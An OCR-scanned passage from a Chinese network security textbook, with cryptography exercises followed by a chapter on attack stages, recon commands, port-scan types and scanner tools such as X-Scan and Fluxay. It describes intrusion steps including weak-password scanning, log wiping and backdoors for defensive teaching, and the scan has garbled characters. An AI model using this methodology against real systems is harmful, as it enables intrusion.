A. 安装 防火 墙 B. 采用 无 线 网 络 传输 
C. 数据 加 密 D. 漏洞 扫描 
8， 甲 方 和 乙方 采用 公 钥 密码 体制 对 数据 文件 进行 加 密 传送 , 甲 方 用 乙方 的 公 钥 加 密 数 
据 文件 ,乙方 使 用 对 数据 文件 进行 解密 。 
A.， 甲 的 公 钥 B. 甲 的 私 钥 
C. 乙 的 公 钥 D. 乙 的 私 钥 
9. 可 以 在 网 上 对 电子 文档 提供 发 布 时 间 的 保护 。 
A. 数字 签名 B. 数字 证 书 
C. 数字 时 间 戳 D. 消息 摘要 
10， 不 是 数字 证 书 的 内 容 。 
A. 公开 密 钥 B. 数字 签名 
C. 证 书 发 行 机 构 的 名 称 D. 私有 密 钥 


11. 以 下 关于 数字 签名 的 说 法 中 错误 的 是 

A. 能 够 检测 报 文 在 传输 过 程 中 是 否 被 算 改 

B. 能 够 对 报 文 发 送 者 的 身份 进行 认证 

C. 能 够 检测 报 文 在 传输 过 程 中 是 否 加 密 

D. 能 够 检测 网 络 中 的 某 一 用 户 是 否 冒 充 另 一 用 户 发 送 报 文 
12. 下 面 是 对 信息 完整 性 的 正确 阐述 。 

A. 信息 不 被 算 改 .假冒 和 伪造 

B. 信息 内 容 不 被 指定 以 外 的 人 所 获悉 

C. 信息 在 传递 过 程 中 不 被 中 转 

D. 信息 不 被 他 人 所 接收 


13. 非 对 称 密码 体制 中 ,加密 过 程 和 解密 过 程 共 使 用 个 密 钥 。 
A.1 B. 2 
C.3 D. 4 
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14. 在 安装 软件 时 ,常会 看 到 弹出 一 个 说 明 该 软件 开发 机 构 的 对 话 框 .并 表明 你 的 系统 


不 信任 这 个 开发 机 构 , 这 是 采用 实现 的 。 
A. 数字 签名 B. 数字 证 书 
C. 数字 时 间 戳 D. 消息 摘要 


15. 消息 摘要 可 用 于 验证 通过 网 络 传输 收 到 的 消息 是 否 是 原始 的 、 未 被 算 改 的 消息 原 
文 。 产 生 消 息 摘要 可 采用 的 算法 是 


A. 哈 希 B. DES 
C. PIN D. RSA 

二 、 填空 题 

1. DES 算法 的 分 组 长 度 为 位 , 密 钥 长 度 为 位 ,需要 进行 轮 

和 迭代 的 乘积 变换 。 

2. 3DES 算法 的 分 组 长 度 为 位 , 密 钥 长 度 为 位 。 

3, IDEA 算法 的 分 组 长 度 为 位 , 密 钥 长 度 为 位 。 

4. AES 算法 的 分 组 长 度 为 位 , 密 钥 长 度 为 位 。 

5. 常用 非 对 称 密码 技术 有 5 二 

6. MD5 算法 产生 的 消息 摘要 有 位 ,SHA/SHA-1 算法 产生 的 消息 摘要 有 
位 。 

7. Diffie-Hellman 算法 仅 限于 的 用 途 ,而 不 能 用 于 或 

8. 对 称 加 密 机 制 的 安全 性 取决 于 的 保密 性 。 

三 、 简 答题 


1. 经 典 密码 技术 包括 哪些 ?它们 主要 采用 哪 两 种 基本 方法 ? 
2. 简 述 对 称 密码 技术 与 非 对 称 密码 技术 的 基本 原理 和 区 别 。 
3. 单 向 散 列 算法 有 何 作 用 ? 它 的 特点 是 什么 ? 

4. 简 述 数字 签名 的 基本 原理 和 作用 。 

5. 第 一 次 使 用 EFS 加 密 后 为 什么 应 及 时 备份 密 钥 ? 

四 、 维 吉 尼 亚 密码 

GSKXWK YC US OXQZ KLSG YC JEQ PJZC 

以 上 是 维 吉 尼 亚 密 文 ( 密 钥 为 FOREST) ,请 把 它 解密 为 明文 : 


五 、 安 全 电子 邮件 
某 公 司 的 业务 员 甲 与 客户 乙 通过 Internet 交换 商业 电子 邮件 。 为 了 保障 邮件 内 容 的 安 
全 ,采用 安全 电子 邮件 技术 对 邮件 内 容 进行 加 密 和 数字 签名 。 安 全 电子 邮件 技术 的 实现 原 
理 如 图 5-69 所 示 。 
1. 为 图 中 (1) 一 (4) 选 择 合 适 的 答案 。 
(1) 一 (4) 的 备 选 答案 如 下 。 
A. DES 算 法 B. MD5 算法 C. 会 话 密 钥 D. 数字 证 字 
E. 甲 的 公 钥 F. 甲 的 私 钥 G. 乙 的 公 钥 ”HH. 乙 的 私 钥 
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gJ39vza 
mp4n 


图 5-69 安全 电子 邮件 技术 


2. 以 下 关于 报 文摘 要 的 说 法 中 正确 的 有 (5) i (6) 
(5) 和 (6) 的 备 选 答案 如 下 : 
A. 不 同 的 邮件 很 可 能 生成 相同 的 摘要 
， 由 邮件 计算 出 其 摘要 的 时 间 非 常 短 
. 由 邮件 计算 出 其 摘要 的 时 间 非 常 长 
.摘要 的 长 度 比 输入 邮件 的 长 度 长 
. 不 同 输 入 邮件 计算 出 的 摘要 长 度 相 同 
F. 仅 根据 摘要 很 容易 还 原 出 原 邮 件 
3. 甲 使 用 Outlook Express 撰写 发 送 给 乙 的 邮件 ,他 应 该 使 用 Cy 的 数字 证 书 
来 添加 数字 签名 ,而 使 用 (8) 的 数字 证 书 来 对 邮件 加 密 。 
(7) 和 (8) 的 备 选 答案 如 下 : 
A. 甲 B. 乙 CG 第 三 方 D. CA 认证 中 心 


HoONrm 
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61 项 目 提 人 出 


最 近 多 位 公司 员工 发 现 自己 计算 机 中 的 内 容 突然 丢失 或 被 算 改 ,有 的 计算 机 还 出 现 莫 
名 其 妙 的 重新 启动 现象 。 网 络 管理 员 小 李 接 到 报告 后 ,迅速 赶 到 现场 查看 ,发现 这 几 台 计算 
机 的 硬盘 均 被 不 同 程度 地 共享 了 ,有 的 计算 机 中 被 植 人 了 木马 ,有 的 计算 机 中 正在 运行 的 进 
程 和 服务 被 突然 停止 ,更 有 其 者 ,有 的 计算 机 的 鼠标 指针 竞 然 会 自行 移动 ,并 执行 了 某 些 操 
作 。 而 查看 这 些 计算 机 的 日 志 却 没 有 任何 发 现 。 这 是 为 什么 呢 ? 


62 项 目 分 析 


从 这 几 台 计算 机 的 现象 来 看 ,非常 明显 ,它们 是 被 黑客 攻击 了 。 小 李 进 一 步调 查 发 现 这 
几 台 出 现 问 题 的 计算 机 存在 着 一 些 共 同 点 :有 的 员工 为 了 自己 使 用 方便 或 其 他 一 些 原因 ,将 
自己 计算 机 的 用 户 名 和 密码 记录 在 了 桌子 旁边 的 本 子 上 .有 的 员工 设置 的 用 户 名 和 密码 非 
常 简单 ,甚至 根本 没有 设置 密码 ; 几 台 计算 机 的 操作 系统 均 为 Windows XP Professional 而 
且 均 默认 打开 了 IPC$ 共享 和 默认 共享 ;有 的 计算 机 未 安装 任何 杀毒 软件 和 防火 墙 , 有 的 安 
装 了 杀毒 软件 但 很 久未 做 升级 .有 的 计算 机 的 本 地 安全 策略 的 安全 选项 中 ,“ 网 络 访问 账户 
的 共享 和 安全 模式 ”的 安全 设置 为 “经 典 一 本 地 用 户 以 自己 的 身份 验证 ”。 

由 于 公司 员工 所 在 的 办 公 室 的 人 员 进 出 较 多 ,有 可 能 他 们 的 用 户 名 和 密码 被 他 人 获知 。 
机 器 中 未 安装 杀毒 软件 和 防火 墙 .可 能 导致 他 人 利用 黑客 工具 可 以 非常 轻松 地 侵入 这 些 计 
算 机 ,然后 设置 硬盘 共享 ,控制 计算 机 的 服务 和 进程 等 。 另 外 ,安全 选项 中 的 “经 典 一 本 地 用 
户 以 自己 的 身份 验证 ”一 项 的 默认 设置 应 为 “ 仅 来 宾 :本 地 用 户 以 来 宾 身 份 验证 ”, 这 样 的 设 
置 可 以 使 本 地 账户 的 网 络 登 录 将 自动 映射 到 Guest 账户 ,否则 ,只 要 获知 本 地 用 户 的 密码 ， 
就 有 可 能 侵入 用 户 的 计算 机 并 访问 和 共享 系统 资源 了 。 

黑客 攻击 的 手段 和 方法 有 很 多 ,本 次 黑客 攻击 的 大 致 过 程 可 能 如 下 :首先 黑客 获得 目标 
主机 的 用 户 名 和 密码 ,密码 可 能 在 员工 办 公 室 中 直接 获得 :也 可 能 利用 黑客 扫描 软件 对 某 个 
IP 地 址 段 的 目标 主机 进行 扫描 ,获得 其 中 弱 口 令 主机 的 用 户 名 和 密码 ;其 次 利用 黑客 攻击 
软件 对 这 些 目标 主机 进行 攻击 ,完成 设置 硬盘 共享 .控制 服务 和 进程 .安装 木马 等 操作 ;最 后 
清除 目标 主机 的 日 志 内 容 , 消 除 和 人 侵 痕迹 。 另 外 ,黑客 还 有 可 能 对 某 些 目标 主机 进行 了 监视 
甚至 控制 。 
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只 要 给 计算 机 及 时 打上 安全 补丁 ,设置 强 口令 ,安装 最 新 的 杀毒 软件 和 防火 墙 ,可 以 防 
范 大 部 分 的 黑客 攻击 。 


63 相关 知识 点 


6.3.1 网 络 攻防 概述 


1. 黑客 概述 


(1) 黑客 的 由 来 

黑客 是 “Hacker" 的 音译 , 源 于 动词 Hack. 在 美国 麻 省 理工 学 院 校园 但 语 中 是 “恶作剧 ” 
的 意思 ,尤其 是 那些 技术 高 明 的 恶作剧 ,确实 ,早期 的 计算 机 黑客 个 个 都 是 编程 高 手 。 因 此 ， 
“黑客 "是 人 们 对 那些 编程 高 手 .迷恋 计算 机 代码 的 程序 设计 人 员 的 称谓 。 真 正 的 黑客 有 自 
己 独 特 的 文化 和 精神 ,并 不 破坏 其 他 人 的 系统 .他们 崇拜 技术 ,对 计算 机 系统 的 最 大 潜力 进 
行 智 力 上 的 自由 探索 。 

美国 发现) 杂志 对 黑客 有 以 下 5 种 定义 。 

G@ 研究 计算 机 程序 并 以 此 增长 自身 技巧 的 人 。 

@ 对 编程 有 无 穷 兴 趣 和 热忱 的 人 。 

@ 能 快速 编程 的 人 。 

@ 某 专门 系统 的 专家 ,如 “UNIX 系统 黑客 ”。 

@ 恶意 冯 入 他 人 计算 机 或 系统 ,意图 盗 取 人 敏感 信息 的 人 。 对 于 这 类 人 最 合适 的 用 词 是 
Cracker( 骇 客 ) ,而 非 Hacker。 两 者 最 主要 的 不 同 是 , Hacker 创造 新 东西 , Cracker 破坏 
东西 。 

(2) 黑客 攻击 的 动机 

随 着 时 间 的 变化 ,黑客 攻击 的 动机 不 再 像 以 前 那样 简单 了 :只 是 对 编程 感 兴趣 ,或 是 为 
了 发 现 系统 漏洞 。 现 在 :黑客 攻击 的 动机 越 来 越 多样 化 .主要 有 以 下 几 种 。 

Q@ 贪心 。 因 为 贪心 而 偷 闪 或 者 识 诈 ,有 了 这 种 动机 , 才 引 发 许多 金融 案件 。 

@ 恶作剧 。 计 算 机 程序 员 搞 的 一 些 恶 作 剧 ,是 黑客 的 老 传 统 。 

@ 名 声 。 有 些 人 为 显露 其 计算 机 经 验 与 才智 ,以便 证 明 自 己 的 能 力 , 获 得 名 气 。 

@ 报复 / 宿 怨 。 解 雇 、 受 批评 或 者 被 降级 的 雇员 ,或 者 其 他 认为 自己 受到 不 公正 待遇 的 
人 ,为 了 报复 而 进行 攻击 。 

@ 无知/ 好奇。 有 些 人 拿 到 了 一 些 攻击 工具 ,因为 好 奇 而 使 用 ,以 至 于 破坏 了 信息 还 不 
知道 。 
@ 仇恨 。 国 家 和 民族 原因 。 

@ 间谍 。 政 治 和 军事 谍报 工作 。 

@ 商业 。 商 业 竞 争 、 商 业 间 谍 。 

黑客 技术 是 网 络 安全 技术 的 一 部 分 ,主要 是 看 用 这 些 技术 做 什么 ,用 来 破坏 其 他 人 的 系 
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统 就 是 黑客 技术 ,用 于 安全 维护 就 是 网 络 安全 技术 。 学 习 这 些 技术 就 是 要 对 网 络 安全 有 更 
深 的 理解 ,从 更 深 的 层次 提高 网 络 安全 。 


2. 网 络 攻击 的 步骤 


进行 网 络 攻击 并 不 是 件 简单 的 事情 , 它 是 一 项 复杂 及 步骤 性 很 强 的 工作 。 一 般 的 攻击 
都 分 为 3 个 阶段 , 即 攻击 的 准备 阶段 .攻击 的 实施 阶段 攻击 的 善后 阶段 ,如 图 6-1 所 示 。 


下 > 陨 , 崇 溢 屠 北 
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定 
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击 
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攻击 的 准备 阶段 | 攻击 的 实施 阶段 攻击 的 善后 阶段 


图 6-1 网 络 攻击 的 3 个 阶段 


(1) 攻击 的 准备 阶段 

在 攻击 的 准备 阶段 重点 做 3 件 事 情 :确定 攻击 目的 .收集 目标 信息 以 及 准备 攻击 工具 。 

@ 确定 攻击 日 的 。 首 先 确定 攻击 希望 达到 的 效果 .这 样 才能 做 下 一 步 工 作 。 

@ 收集 日 标 信息 。 在 获取 了 日 标 主机 及 其 所 在 网 络 的 类 型 后 ,还 需 进一步 获取 有 关 信 
息 , 如 日 标 主 机 的 IP 地 址 ,操作 系统 的 类 型 和 版 本 、 系 统管 理 人 员 的 邮件 地 址 等 ,根据 这 些 
信息 进行 分 析 , 可 以 得 到 被 攻击 系统 中 可 能 存在 的 漏洞 。 

加 准备 攻击 工具 。 收 集 或 编写 适当 的 工具 ,并 在 操作 系统 分 析 的 基础 上 ,对 工具 进行 
评估 ,判断 有 哪些 漏洞 和 区 域 没有 覆盖 到 。 

(2) 攻击 的 实施 阶段 

本 阶段 实施 具体 的 攻击 行动 。 作 为 破坏 性 攻击 ,只 需 利 用 工具 发 起 攻击 即 可 ;而 作为 和 
侵 性 攻击 ,往往 需要 利用 收集 到 的 信息 ,找到 系统 漏洞 ,然后 利用 该 漏洞 获取 一 定 的 权限 。 
大 多 数 攻击 成 功 的 范例 都 是 利用 被 攻击 者 系统 本 身 的 漏洞 。 能 够 被 攻击 者 利用 的 漏洞 不 仅 
包括 系统 软件 设计 上 的 漏洞 ,也 包括 由 于 管理 配置 不 当 而 造成 的 漏洞 。 

攻击 的 实施 阶段 的 一 般 步 又 如 下 。 

@ 隐藏 自己 的 位 置 。 攻 击 者 利用 隐藏 IP 地 址 等 方式 保护 自己 不 被 追踪 。 

@ 利用 各 种 手段 登录 目标 主机 。 攻 击 者 要 想 入 侵 一 台 主 机 ,仅仅 知道 它 的 IP 地 址 、 操 
作 系 统 信息 是 不 够 的 ,还 必须 有 该 主机 的 一 个 账号 和 密码 ,否则 连 登录 都 无 法 进行 。 他 们 先 
设法 盗 取 账户 文件 ,进行 破解 或 进行 弱 口 令 猜 测 , 获 取 某 用 户 的 账户 和 密码 ,再 寻找 合适 时 
机 以 此 身份 进入 主机 。 

@ 利用 漏洞 后 门 获得 控制 权 。 攻 击 者 用 FTP、Telnet 等 工具 上 且 利 用 系统 漏洞 进入 目标 
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主机 系统 获得 控制 权 后 ,就 可 以 做 任何 他 们 想 做 的 事情 了 。 例 如 ,下 载 敏 感 信息 ;窃取 账户 
密码 .信用卡 号码; 使 网 络 瘫痪 等 。 也 可 以 更 改革 些 系统 设置 ,在 系统 中 放置 特洛伊 木马 或 
其 他 远程 控制 程序 ,以 便 日 后 可 以 不 被 察觉 地 再 次 进入 系统 。 

(3) 攻击 的 善后 阶段 

对 于 攻击 者 来 说 ,完成 前 两 个 阶段 的 工作 ,也 就 基本 完成 了 攻击 的 目的 ,所 以 ,攻击 
的 善后 阶段 往往 会 被 忽视 。 如 果 完 成 攻击 后 不 做 任何 善后 工作 ,那么 他 的 行踪 会 很 快 被 
细心 的 系统 管理 员 发 现 , 因 为 所 有 的 网 络 操作 系统 一 般 都 提供 日 志 记录 功能 ,记录 所 执 
行 的 操作 。 

为 了 自身 的 隐蔽 性 ,高 水 平 的 攻击 者 会 抹 掉 在 日 志 中 留 下 的 痕迹 。 最 简单 的 方法 就 是 
删除 日 志 , 这 样 做 虽然 避免 了 自己 的 信息 被 系统 管理 员 追 踪 到 ,但 是 也 明确 无 误 地 告诉 了 对 
方 系统 被 人 侵 了 ,所 以 最 常见 的 方法 是 对 日 志文 件 中 有 关 自 己 的 那 一 部 分 进行 修改 。 

清除 完 日 志 后 ,需要 植 入 后 门 程序 ,因为 一 旦 系统 被 攻破 ,攻击 者 希望 日 后 能 够 不 止 一 
次 地 进入 该 系统 。 为 了 下 次 攻击 的 方便 ,攻击 者 都 会 留 下 一 个 后 门 。 充 当 后 门 的 工具 种 类 
非常 多 ,如 传统 的 木马 程序 。 为 了 能 够 将 受害 主机 作为 跳板 去 攻击 其 他 目标 ,攻击 者 还 会 在 
其 上 安装 各 种 工具 ,包括 嗅 探 器 .扫描 器 .代理 等 。 


3. 网 络 攻击 的 防范 策略 


在 对 网 络 攻击 进行 分 析 的 基础 上 ,应 当 认 真 制定 有 针对 性 的 防范 策略 。 明 确 安 全 对 象 ， 
设置 强 有 力 的 安全 保障 体系 。 有 的 放 矢 ,在 网 络 中 层 层 设防 ,使 每 一 层 都 成 为 一 道 关 卡 , 从 
而 让 攻击 者 无 隙 可 钻 。 还 必须 做 到 未 雨 绸 继 ,预防 为 主 , 备 份 重要 的 数据 ,并 时 刻 注意 系统 
运行 状况 。 以 下 是 针对 众多 令 人 担心 的 网 络 安全 问题 所 提出 的 几 点 建议 。 

(1) 提高 安全 意识 

GD 不 要 随意 打开 来 历 不 明 的 电子 邮件 及 文件 ,不 要 随便 运行 不 太 了 解 的 人 发 送 的 程 
序 , 比 如 “特洛伊 "类 黑客 程序 就 是 欺骗 接收 者 运行 。 

@ 尽量 避免 从 Internet 下 载 不 知名 的 软件 ,游戏 程序 。 即 使 从 知名 的 网 站 下 载 的 软件 
也 要 及 时 用 最 新 的 病毒 和 木马 查 杀 软件 对 软件 和 系统 进行 扫描 。 

@ 密码 设置 尽 可 能 使 用 字母 数字 混 排 ,单纯 的 英文 或 者 数字 很 容易 穷 举 。 将 常用 的 密 
码 设置 不 同 ,防止 被 人 查 出 一 个 ,连带 到 重要 密码 。 重 要 密码 最 好 经 常 更 换 。 

@ 及 时 下 载 安 装 系 统 补丁 程序 。 

回 不 要 随便 运行 黑客 程序 ,许多 这 类 程序 运行 时 会 发 出 用 户 的 个 人 信息 。 

@ 定期 备份 重要 数据 。 

(2) 使 用 防 病 毒 和 防火 墙 软件 

防火 墙 是 一 个 用 于 阻止 网 络 中 的 黑客 访问 某 个 网 络 的 屏障 ,也 可 称 为 控制 进 / 出 两 个 方 
向 通信 的 门槛 。 在 网 络 边界 上 通过 建立 起 来 的 相应 网 络 通信 监控 系统 来 隔离 内 部 和 外 部 网 
络 ,以 阻挡 外 部 网 络 的 侵入 。 将 防 病毒 工作 当成 日 常 例 行 工 作 , 及 时 更 新 防 病毒 软件 和 病 
毒 库 。 

(3) 隐藏 自己 的 IP 地 址 

隐藏 自己 的 IP 地 址 是 很 重要 的 。 事 实 上 ,即便 用 户 的 机 器 上 安装 了 木马 程序 , 若 没 有 
该 机 器 IP 地 址 ,攻击 者 也 是 没有 办 法 入 侵 的 .而 保护 IP 地 址 的 最 好 方法 是 设置 代理 服务 
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器 。 代 理 服务 器 能 起 到 外 部 网 络 申请 访问 内 部 网 络 的 转 接 作用 .其 功能 类 似 于 一 个 数据 转 
发 器 , 它 主 要 控制 哪些 用 户 能 访问 哪些 服务 类 型 。 


6.3.2 目标 系统 的 探测 


1. 常用 DOS 命令 


(1) ping 命令 

ping 命令 是 入 侵 者 常用 的 网 络 命令 ,该 命令 主要 用 于 测试 网 络 的 连通 性 。 例 如 ,使 用 
“ping 192. 168. 1. 1” 命 令 , 如 果 返 回 结果 是 “Reply from 192. 168. 1. 1:bytes 一 32 time 一 1ms 
TTL=128”, 目 标 主机 有 响应 ,说 明 192. 168. 1. 1 这 台 主 机 是 活动 的 。 如 果 返 回 的 结果 是 
“Request timed out. ”, 则 目标 主机 不 是 活动 的 ,即日 标 主机 不 在 线 或 安装 有 防火 墙 ,这 样 的 
主机 是 不 容易 入 侵 的 。 不 同 的 操作 系统 对 于 ping 的 TTL 返回 值 是 不 同 的 ,如 表 6-1 所 示 。 


表 6-1 不 同 的 操作 系统 对 ping 的 TTL 返回 值 


操作 系统 默认 TTL 返回 值 
UNIX 类 255 
Windows 95 32 
Windows 2000/2003/XP 128 
Windows 7 64 


因此 ,入 侵 者 可 以 根据 不 同 的 TTL 返回 值 来 推测 目标 主机 究竟 属于 何 种 操作 系统 。 
对 于 入 侵 者 的 这 种 信息 收集 手段 ,网 络 管理 员 可 以 通过 修改 注册 表 来 改变 默认 的 TTL 返 
回 值 。 

在 一 般 情况 下 黑客 是 如 何 得 到 目标 IP 地 址 和 目标 主机 的 地 址 位 置 的 呢 ? 他 们 可 以 通 
过 以 下 方法 来 实现 。 

@ 由 域名 得 到 网 站 IP 地 址 。 

方法 一 :ping 命令 试探 。 如 黑客 想 知 道 百 度 服务 器 的 了 P 地 址 ,运行 ping www. baidu. com 
命令 即 可 ,如 图 6-2 所 示 。 从 图 6-2 可 见 , www. baidu. com 对 应 的 IP 地 址 为 119. 75 
.218.77。 

方法 二 :nslookup 命令 试探 。 同 样 以 百度 服务 器 为 例 . 运 行 “nslookup www. baidu 
.com” 命 令 , 如 图 6-3 所 示 。 从 图 6-3 可 知 ,Addresses 后 面 列 出 的 就 是 www. baidu. com 所 
使 用 的 Web 服务 器 群 里 的 IP 地 址 。 

四 由 了 JP 地址 查询 目标 主机 的 地 理 位 置 。 由 于 JIP 地址 的 分 配 是 全 球 统一 管理 的 ,因此 
黑客 可 以 通过 查询 有 关机 构 的 IP 地 址 数据 库 就 可 以 得 到 该 IP 地 址 所 对 应 的 地 理 位 置 ,由 
于 卫 管 理 机 构 多 处 于 国外 .而 且 分 布 比较 零散 ,这 里 介绍 一 个 能 查询 到 IP 数据 库 的 网 站 
http://www. ip. cn/ ,如 图 6-4 所 示 。 

如 要 查询 119. 75. 218. 77( 百 度 的 IP 地 址 ) 的 地 理 位 置 ,可 在 图 6-4 中 的 文本 框 中 输入 
该 IP 地 址 ,然后 单 击 “ 查 询 ” 按 钮 .就 可 得 到 如 图 6-4 所 示 的 结果 。 
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(2) netstat 命令 


图 6-2 ping 命令 试探 


图 6-3 ”nslookup 命令 试探 


图 6-4 由 IP 地 址 查询 目标 主机 的 地 理 位 置 


netstat 命令 有 助 于 了 解 网 络 的 整体 使 用 情况 。 它 可 以 显示 当前 正在 活动 的 网 络 连 接 
的 详细 信息 ,如 采用 的 协议 类 型 .当前 主机 与 远 端 相连 主机 的 IP 地 址 以 及 它们 之 间 的 连接 


状态 等 。 


netstat 命令 的 主要 


目 途 是 检测 本 地 系统 开放 的 端口 ,这 样 做 可 以 了 解 自 己 的 系统 开放 


了 什么 服务 .还 可 以 初步 推断 系统 是 否 存在 木马 .因为 常见 的 网 络 服务 开放 的 默认 端口 轻易 


不 会 被 木马 占用 。 
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(3) nbtstat 命令 

nbtstat 命令 用 于 显示 本 地 计算 机 和 远程 计算 机 的 基于 TCP/IP 的 NetBIOS 统计 资料 、 
NetBIOS 名 称 表 和 NetBIOS 名 称 缓存 。nbtstat 命令 可 以 刷新 NetBIOS 名 称 缓存 和 使 用 
Windows Internet 名 称 服务 (WINS) 注 册 的 名 称 。 使 用 不 带 参 数 的 nbtstat 命令 显示 帮助 。 


2. 扫描 器 


(1) 扫描 器 的 作用 

对 于 扫描 器 的 理解 ,大 家 一 般 会 认为 ,这 只 是 黑客 进行 网 络 攻击 时 的 工具 。 扫 描 器 对 于 
攻击 者 来 说 是 必 不 可 少 的 工具 ,但 也 是 网 络 管理 员 在 网 络 安全 维护 中 的 重要 工具 。 因 为 扫 
描 软 件 是 系统 管理 员 掌握 系统 安全 状况 的 必 备 工具 ,是 其 他 工具 所 不 能 替代 的 。 通 过 扫描 
工具 可 以 提前 发 现 系统 的 漏洞 , 打 好 补丁 ,做 好 防范 。 

扫描 器 的 主要 功能 如 下 。 

OO 检测 主机 是 否 在 线 。 

@ 扫描 日 标 系统 开放 的 端口 ,有 的 还 可 以 测试 端口 的 服务 信息 。 

@ 获取 目标 操作 系统 的 敏感 信息 。 

@ 破解 系统 口令 。 

@@ 扫描 其 他 系统 敏感 信息 。 例 如 ,CGI Scanner、ASP Scanner、 从 各 个 主要 端口 取得 服 
务 信 息 的 Scanner、 数 据 库 Scanner 以 及 木马 Scanner 等 。 

日 前 各 种 扫描 器 软件 有 很 多 ,比较 著名 的 有 X-scan、 流 光 (Fluxay) 、X-Port、SuperScan、 
PortScan、Nmap、X-WAY 等 。 

(2) 端口 扫描 

端口 扫描 是 入 侵 者 搜集 信息 的 常用 手法 ,通过 端口 扫描 .能 够 判断 出 日 标 主机 开放 了 哪 
些 服务 .运行 哪 种 操作 系统 ,为 下 一 步 的 和 人 侵 做 好 准备 。 端 口 扫描 尝试 与 目标 主机 的 某 些 端 
口 建立 TCP 连接 ,如 果 目 标 主机 端口 有 回复 , 则 说 明 该 端口 开放 , 即 为 “活动 端口 ”。 一 般 ， 
端口 扫描 可 分 为 以 下 4 种 方式 。 

@ 全 TCP 连接 。 这 种 扫描 方法 使 用 “三 次 握手 ”, 与 日 标 主机 建立 标准 的 TCP 连接。 
这 种 方法 容易 被 目标 主机 记录 ,但 获取 的 信息 比较 详细 。 

@ 半 打 开 式 扫描 (SYN 扫描 )。 扫 描 主 机 自动 向 目标 主机 的 指定 端口 发 送 SYN 报 文 ， 
表示 发 送 建立 连接 请 求 。 由 于 扫描 过 程 中 ,全 连接 尚未 建立 ,所 以 大 大 降低 了 被 目标 主机 记 
录 的 可 能 ,并 且 加 快 了 扫描 速度 。 

e@ 若 日 标 主 机 的 回应 TCP 报 文中 “SYN==1,ACK 二 1”, 则 说 明 该 端口 是 活动 的 , 接 下 
来 扫描 主机 发 送 一 个 RST 报 文 给 日 标 主机 ,拒绝 建立 TCP 连接 ,从 而 导致 三 次 握手 的 
失败 。 

e@ 若 目 标 主机 的 回应 是 RST 报 文 , 则 表示 该 端口 不 是 活动 端口 。 这 种 情况 下 ,扫描 主 
机 不 做 任何 回应 。 

@ FIN 扫描 。 依 靠 发 送 FIN 报 文 来 判断 日 标 主机 的 指定 端口 是 否 活动 。 发 送 一 个 
FIN 二 1 的 TCP 报 文 到 一 个 关闭 的 端口 时 ,该 报 文 会 被 丢掉 ,并 返回 一 个 RST 报 文 .但 如 果 
当 FIN 报 文 发 送 到 一 个 活动 端口 时 ,该 报 文 只 是 简单 地 丢掉 ,不 会 返回 任何 回应 。 从 中 可 
以 看 出 ,FIN 扫描 没有 涉及 任何 TCP 连接 部 分 ,因此 这 种 扫描 比 前 两 种 都 安全 。 
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@ 第 三 方 扫 描 ( 代 理 扫描 )。 利 用 第 三 方 主机 来 代替 入 侵 者 进行 扫描 ,这 个 第 三 方 主机 
一 般 是 入 侵 者 通过 入 侵 其 他 计算 机 而 得 到 的 ,该 主机 又 被 称 为 * 肉 机 ”, 一 般 是 安全 防御 系数 
极 低 的 个 人 计算 机 。 

(3) 扫描 工具 

@ X-scan 扫描 器 。X-scan 是 国内 最 著名 的 综合 扫描 器 之 一 , 它 完 全 免费 ,是 不 需要 安 
装 的 绿色 软件 ,界面 支持 中 文 和 英文 两 种 语言 ,提供 了 图 形 界面 和 命令 行 两 种 操作 方式 。 
X-scan 把 扫描 报告 和 “安全 焦点 ”网 站 相连 接 , 对 扫描 到 的 每 个 漏洞 进行 “风险 等 级 ”评估 ， 
并 提供 漏洞 描述 、 漏 洞 解 决 方案 ,方便 网 络 管理 员 测 试 , 修 补漏 洞 。X-Scan 的 主 界面 如 
图 6-5 所 示 。 


-se 3 cm 
文件 设置 全 查看 EE) 工具 ID Lwessee 各 县 避 ) 
J@© Li el 图 | 国 沼 | 避 
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图 6-5 X-Scan 的 主 界面 


X-Scan 的 使 用 步骤 如 下 。 

步骤 1: 设置 检测 范围 。 

步骤 2: 设置 扫描 模块 。 扫 描 模块 包括 开放 服务 .NT-Server 弱 口 令 `.NetBIOS 信息 、 
SNMP 信息 、 远 程 操作 系统 、Telnet 弱 口令 、SSH 弱 口 令 、REXEC 弱 口 令 .FTP 弱 口 令 、 
SQL-Server 弱 口令 `WWW 弱 口 令 .CVS 弱 口 令 、.VNC 弱 口 令 .POP3 弱 口 令 .SMTP 弱 口 
令 .IMAP 弱 口 令 `NNTP 弱 口 令 .SOCK5 弱 口 令 IIS 编码 /解码 漏洞 .漏洞 检测 脚本 20 多 
个 模块 。 

步骤 3: 设置 并 发 扫描 及 端口 相关 设置 。 

e@ 并 发 线程 : 值 越 大 速度 越 快 (建议 设 为 500)。 

e@ 并 发 主机 : 值 越 大 扫描 主机 越 多 (建议 设 为 10) 。 

e@ 建议 跳 过 ping 不 通 的 主机 。 

步骤 4: 设置 待 检测 端口 ,确定 检测 方式 。 检 测 方式 有 TCP 和 SYN 两 种 方式 。 

@ 流光 (Fluxay) 扫 描 器 。 流 光 是 非常 优秀 的 扫描 工具 . 它 是 由 国内 高 手 小 榕 精心 打造 
的 综合 扫描 器 。 其 功能 非常 强大 ,不 仅 能 够 像 X-Scan 那样 扫描 众多 漏洞 、 弱 口令 ,而且 集成 
了 常用 的 入 侵 工 具 , 如 字典 工具 .NTVIIS 工具 等 ,还 独创 了 能 够 控制 “ 肉 机 ?进行 扫描 的 “ 流 
光 Sensor 工具 ?和 为 “ 肉 机 ?安装 服务 的 “种 植 者 工具 。 
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@ X-Port 扫描 器 。X-Port 提供 多 线程 方式 扫描 目标 主机 的 开放 端口 :扫描 过 程 中 根 
据 TCP/IP 堆栈 特征 被 动 识别 操作 系统 类 型 , 若 没 有 匹配 记录 ,尝试 通过 NetBIOS 判断 是 
否 为 Windows 系列 操作 系统 ,并 尝试 获取 系统 版 本 信息 。 

@ SuperScan 扫描 器 。SuperScan 是 一 个 集 “端口 扫描 ”ping、“ 主 机 名 解析 ”于 一 体 的 
扫描 器 。 其 功能 如 下 。 

e@ 检测 主机 是 否 在 线 。 

®@ IP 地 址 和 主机 名 之 间 的 相互 转换 。 

®@ 通过 TCP 连接 试探 目标 主机 运行 的 服务 。 

e 扫描 指定 范围 的 主机 端口 。 

e 支持 使 用 文件 列表 来 指定 扫描 主机 范围 。 

@@ 其 他 端口 扫描 工具 。 包 括 PortScan、Nmap、X-WAY 等 。 


6.3.3 网 络 监听 


在 项 目 3 中 介绍 了 一 种 网 络 流量 分 析 的 技术 , 即 网 络 监听 。 网 络 监听 是 黑客 在 局 域 网 
